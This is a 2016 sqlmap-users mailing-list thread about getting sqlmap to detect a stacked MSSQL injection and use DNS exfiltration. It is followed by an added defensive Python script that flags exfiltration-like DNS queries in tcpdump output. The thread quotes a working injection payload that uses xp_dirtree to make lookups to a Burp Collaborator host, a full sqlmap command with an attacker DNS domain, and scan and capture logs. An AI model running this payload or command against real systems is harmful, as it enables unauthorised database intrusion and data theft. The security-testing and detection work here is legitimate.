Re: [sqlmap-users] Sqlmap/DNS exfil
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:06:43
My last message for today. You've said "However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests" <- you should really focus on why stacked SQLi hasn't worked in the first place. After you fix that one, you can try to use dns-exfil to speed up the data retrieval of otherwise slow stacked SQLi.

Bye

On Tue, Dec 20, 2016 at 12:04 AM, Miroslav Stampar <mir...@gm...> wrote:
> As said, there should be at least one other SQLi technique available. In
> your case there is NONE. sqlmap will not blindly use dns-exfil if at least
> one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>
>> Thanks, that's good advice. And I probably should post a little more
>> detail on what I'm running here so others can see it as well.
>>
>> Here's the command executing:
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>> And then, my capture results for DNS traffic:
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>> It doesn't seem like an injection pattern is being tried that is getting
>> the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> *From:* Miroslav Stampar <mir...@gm...>
>> *Sent:* Monday, December 19, 2016 4:10 PM
>> *To:* Mark M.
>> *Cc:* sql...@li...
>> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you run Wireshark or similar when running with
>> --dns-domain to properly debug what is going on. There could be really lots
>> of problems before you fine tune it (e.g. another service running on :53).
>>
>> About "forcing" sqlmap to use dns-exfil: it will always at least
>> try to test it at the start of a run (if another injection technique is
>> available). Also, it will prefer other "faster" techniques (ERROR and
>> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
>> which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give you is to run Wireshark during
>> the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>>
>>> I have a situation where Burp has detected the following DNS
>>> exfiltration injection for a query parameter in a web app:
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>>>
>>> I've modified the domain and verified that I receive the DNS requests on
>>> my local DNS server (the domain which I provide to sqlmap using the
>>> --dns-domain=xxx option) when the injection is manually sent to the page.
>>> The problem is, when I pass the request to sqlmap it's not detecting that
>>> there's an injection at all. I've provided the OS/DBMS and --level 5, but
>>> still no dice. I'm using sqlmap v1.0.12#stable.
>>>
>>> Since I've gotten many other injections to work in the past, I believe
>>> that I'm using sqlmap properly (formatting my request in a file
>>> appropriately, specifying the correct parameter to test, etc.) However, it
>>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>>> injection would slip by all of sqlmap's tests. Is there a way to force
>>> sqlmap to try DNS exfiltration injections despite no other injection
>>> technique succeeding?
>>>
>>> Thanks
>>>
>>> V
>>>
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
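Added example, not from the thread or from sqlmap: a small triage script for a defender reading a capture like the one above. It parses tcpdump's one-line DNS query summaries, skips answer lines, and flags lookups whose leftmost label looks like an encoded payload, the pattern an xp_dirtree-driven exfiltration run leaves in DNS logs and the pattern the capture above lacks (it holds only www.testsite.org lookups). The sample lines are constructed; the 203.0.113.7 source, the dns.example.net parent domain and the two thresholds are assumptions.

```python
import math
import re
from collections import Counter, defaultdict

# tcpdump one-line DNS query summary, e.g.
# 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
QUERY_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) IP (?P<src>[\d.]+)\.\d+ > (?P<dst>[\d.]+)\.53: "
    r"\d+\+ (?P<qtype>[A-Z]+)\? (?P<name>[^ ]+)\. \(\d+\)$"
)
MIN_LABEL_LEN = 20  # assumption: real hostnames rarely carry a label this long
MIN_ENTROPY = 3.0   # bits/char; hex or base32-style payload labels score well above this

# Constructed sample: three lines modelled on the thread's capture (an answer line is
# included so the parser must skip it) plus one constructed payload-style lookup.
SAMPLE = """\
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
16:57:02.100000 IP 203.0.113.7.51234 > 8.8.8.8.53: 1001+ A? q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.dns.example.net. (74)
""".splitlines()

def shannon_entropy(text):
    """Bits per character; random-looking payload labels score high, 'www' scores 0."""
    if not text:
        return 0.0
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())

def parse_queries(lines):
    """Yield (ts, src, qtype, qname) for outbound query lines; answer lines do not match."""
    for line in lines:
        m = QUERY_RE.match(line.strip())
        if m:
            yield m["ts"], m["src"], m["qtype"], m["name"]

def is_exfil_like(qname):
    """True when the leftmost label looks like an encoded payload rather than a hostname."""
    label = qname.split(".")[0]
    return len(label) >= MIN_LABEL_LEN and shannon_entropy(label) >= MIN_ENTROPY

def triage(lines):
    """Return (flagged queries, number of distinct qnames seen per parent domain)."""
    flagged, seen = [], defaultdict(set)
    for ts, src, qtype, qname in parse_queries(lines):
        seen[".".join(qname.split(".")[-2:])].add(qname)  # crude parent-domain key
        if is_exfil_like(qname):
            flagged.append((ts, src, qtype, qname))
    return flagged, {k: len(v) for k, v in seen.items()}
```

The per-domain count is the second signal to watch over a whole capture: an exfiltration run produces many distinct subdomains under one parent, while the capture in the thread repeats a single name.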